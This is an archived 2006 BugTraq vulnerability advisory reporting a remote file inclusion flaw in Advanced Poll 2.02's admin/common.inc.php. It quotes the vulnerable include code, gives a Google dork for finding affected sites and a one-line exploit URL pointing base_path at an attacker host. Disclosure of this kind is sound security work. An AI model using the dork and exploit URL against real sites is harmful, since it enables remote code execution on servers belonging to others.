BugTraq
SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion Jul 21 2006 08:36AM
chris_hasibuan yahoo com
#############################SolpotCrew Community################################

#

# Advanced Poll ver 2.02 (base_path) Remote File Inclusion

#

# Vendor site : http://www.proxy2.de/scripts.php

#

########################################################################
#########

#

#

# Bug Found By :Solpot a.k.a (k. Hasibuan)

#

# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]

#

# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt

#

########################################################################
########

#

#

# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,

# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy

# home_edition2001 , Rendy ,Tje , m3lky , no-profile

# and all crew #mardongan @ irc.dal.net

#

#

########################################################################
#######

Input passed to the "base_path" is not properly verified

before being used to include files. This can be exploited to execute

arbitrary PHP code by including files from local or external resources.

code from /admin/common.inc.php

$pollvars['SELF'] = basename($PHP_SELF);

if (file_exists("$base_path/lang/$pollvars[lang]")) {

include ("$base_path/lang/$pollvars[lang]");

} else {

include ("$base_path/lang/english.php");

google dork : inurl:comments.php?action= send id

EXPLOIT :

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http
://atacker

##############################MY LOVE JUST FOR U RIE#########################

######################################E.O.F#############################
#####

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus